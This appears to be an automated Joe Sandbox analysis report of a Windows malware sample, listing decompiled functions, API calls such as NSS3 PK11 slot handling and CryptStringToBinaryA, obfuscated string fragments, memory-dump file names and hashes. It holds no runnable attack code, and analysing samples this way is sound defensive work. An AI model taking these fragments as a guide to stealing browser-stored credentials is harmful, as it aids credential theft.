lstrcat.KERNEL32(?,00380B46), ref: 0036C943
lstrcat.KERNEL32(?,00380B47), ref: 0036C957
PK11_FreeSlot.NSS3(?), ref: 0036C961
lstrcat.KERNEL32(?,00380B4E), ref: 0036C978

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 2ef4fa03205e040b41ada4e7472261bb05edf8b8413047c5bc1f465f1c8255c9
Instruction ID: 66e58b4d5882876de950a797c6710b75ad6b70e8d26e6743019d627631568a39
Opcode Fuzzy Hash: 2ef4fa03205e040b41ada4e7472261bb05edf8b8413047c5bc1f465f1c8255c9
Instruction Fuzzy Hash: 8D417F75D0421ADBDB51DFA0CD89BFEB7B8BB48304F1081A8E509A7280D7749B88DF91

Function 007353B8 Relevance: 12.5, Strings: 9, Instructions: 1221COMMON

Download Yara Rule

Strings

2ge, xrefs: 00735492
;, xrefs: 007361F1
&h[\, xrefs: 007357AC
)v, xrefs: 00735D22
!~{, xrefs: 00735BAC
*|V3, xrefs: 007358CC
T.q>, xrefs: 00736229
#SfF, xrefs: 00735676
G[^M, xrefs: 00735605

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: )v$#SfF$&h[\$*|V3$2ge$G[^M$T.q>$!~{$;
API String ID: 0-2490256983
Opcode ID: f3cf271342eabdfbc11dec05d6e33fcfee7fd5dd649a6cdbb997b689fb2ff961
Instruction ID: 9449436da15b5669f513c734d53cac1edcf97739d98467f9db41cb35ae230382
Opcode Fuzzy Hash: f3cf271342eabdfbc11dec05d6e33fcfee7fd5dd649a6cdbb997b689fb2ff961
Instruction Fuzzy Hash: 4F823AF3A0C2049FE3046E29EC8567ABBE5EFD4320F1A463DEAC5C3744EA7558058697

Function 00733372 Relevance: 11.6, Strings: 8, Instructions: 1634COMMON

Download Yara Rule

Strings

^)w, xrefs: 007340B1
xC?~, xrefs: 0073363B
_EZm, xrefs: 00733931
Pwo8, xrefs: 00734563
aRw, xrefs: 00734174
#%[a, xrefs: 0073407C
_EZm, xrefs: 00733922
_4w, xrefs: 00733B76

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: #%[a$Pwo8$^)w$_4w$_EZm$_EZm$aRw$xC?~
API String ID: 0-2153086426
Opcode ID: da909b2e5841b9cb2bc1421ec10cc98197dc4b987f2b5164accacf84ec628b86
Instruction ID: 52653cc646ab0ec2fc0a284bf5a085d230ccdc394646923d68ae127c8be93641
Opcode Fuzzy Hash: da909b2e5841b9cb2bc1421ec10cc98197dc4b987f2b5164accacf84ec628b86
Instruction Fuzzy Hash: B7B207F360C2009FE704AE2DEC8577AB7E5EF94720F1A853DEAC4C7744EA3598058696

Function 00725B36 Relevance: 10.3, Strings: 7, Instructions: 1590COMMON

Download Yara Rule

Strings

|~o=, xrefs: 007261B0
%o_?, xrefs: 007261CA
d.8, xrefs: 00726C07
NN~~, xrefs: 007261EA
ISi, xrefs: 007268BB
gO~}, xrefs: 00726888
%o_?, xrefs: 007261E1

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %o_?$%o_?$NN~~$d.8$gO~}$|~o=$ISi
API String ID: 0-4262658623
Opcode ID: 9c87bb606d07d970d360fa79910af7dd953b63108c985adee151b805df4016ca
Instruction ID: a3e462da2866841a2675c2985c50d5ca3b1d7b0bd35c149a59c64bdb017a490f
Opcode Fuzzy Hash: 9c87bb606d07d970d360fa79910af7dd953b63108c985adee151b805df4016ca
Instruction Fuzzy Hash: 50B2F6F3A0C2009FE3046E29EC8567AF7E9EFD4320F1A853DEAD483744EA7558058697

Function 0072C6F0 Relevance: 9.2, Strings: 6, Instructions: 1661COMMON

Download Yara Rule

Strings

@`~}, xrefs: 0072D6B9
ZA._, xrefs: 0072D022
vw~, xrefs: 0072CD6B
xI{, xrefs: 0072D456
7.k, xrefs: 0072D328
|o?, xrefs: 0072D20D

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 7.k$@`~}$ZA._$vw~$xI{$|o?
API String ID: 0-4060493939
Opcode ID: 24e19e585dae7e621162c94deefa3059e9b7c7e01fddb5dfed0971812484c8a8
Instruction ID: 1492b504d9f6dece3cbbf0e99e8a998cb05e8d03599a9f86de324490574befac
Opcode Fuzzy Hash: 24e19e585dae7e621162c94deefa3059e9b7c7e01fddb5dfed0971812484c8a8
Instruction Fuzzy Hash: BEB209F360C204AFE3046E2DEC45A7ABBE9EFD4320F16853DE6C5C7744EA3598058696

Function 0072ACB5 Relevance: 9.1, Strings: 6, Instructions: 1563COMMON

Download Yara Rule

Strings

dFxu, xrefs: 0072AD66
jw, xrefs: 0072B13A
0g]k, xrefs: 0072B55F
=E{}, xrefs: 0072B0D1
:m, xrefs: 0072BB47
do/, xrefs: 0072B021

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: :m$0g]k$=E{}$dFxu$do/$jw
API String ID: 0-1148831581
Opcode ID: 3afb66737b4fb5286dab31db68aef91aacca99374f4fc46653f29e2e2bb1432b
Instruction ID: 8c05faea640509507f3a24e4bc3e741d5f4d4b841d7560ff849014edf3b4cecf
Opcode Fuzzy Hash: 3afb66737b4fb5286dab31db68aef91aacca99374f4fc46653f29e2e2bb1432b
Instruction Fuzzy Hash: AFB206F3608604AFE304AF2DDC8567AFBE9EF94720F1A492DE6C4C3744E63598058697

Function 00369AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N6,00000000,00000000), ref: 00369AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00364EEE,00000000,?), ref: 00369B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N6,00000000,00000000), ref: 00369B2A
LocalFree.KERNEL32(?,?,?,?,00364EEE,00000000,?), ref: 00369B3F

Strings

N6, xrefs: 00369AD4, 00369AE1, 00369AF9, 00369B18, 00369AE4, 00369B1B

Memory Dump Source

Source File: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: N6
API String ID: 4291131564-1165058958
Opcode ID: 1f07a22f58f99bee9db8da1dcfc17b4e4a26a989f5334e0b58fcbe865e3bd8fe
Instruction ID: b3e24f742049c4c9682642b6b33b57d0451e2bc08e52dd98bb1dd1a8a39ed795
Opcode Fuzzy Hash: 1f07a22f58f99bee9db8da1dcfc17b4e4a26a989f5334e0b58fcbe865e3bd8fe
Instruction Fuzzy Hash: 4B11A4B4240208EFEB11CF64DC95FAA77B9FB89B10F208059F9159B394C775A901DB60

Function 00727645 Relevance: 7.8, Strings: 5, Instructions: 1577COMMON

Download Yara Rule

Strings

*_^, xrefs: 00727BDB
p{_, xrefs: 00727777
;`%Z, xrefs: 00727FCF
Evr, xrefs: 0072773A, 00727913, 0072794D, 00727956, 007279A9, 00727A0B, 00727A1C, 00727A1D, 00727A3D, 00727A76
Y12\, xrefs: 00728435

Memory Dump Source

Source File: 00000000.00000002.1950439129.00000000005BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1949992638.0000000000360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000361000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000003F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000411000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000442000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000046F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.0000000000525000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950016407.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000824000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.0000000000852000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950439129.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950698990.0000000000860000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950816123.00000000009FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1950832979.00000000009FF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_file.jbxd

Yara matches

Similarity

API ID:
String ID: *_^$;`%Z$Evr$Y12\$p{_
API String ID: 0-194699597
Opcode ID: 97a1d927787848033f17c7c091dabc90807da96b21a0e6fa3168b178c29a2b84
Instruction ID: f022d0923a0e5c6143ac6848447b6b9622b2175d2b738306320b7d7f228d03a0
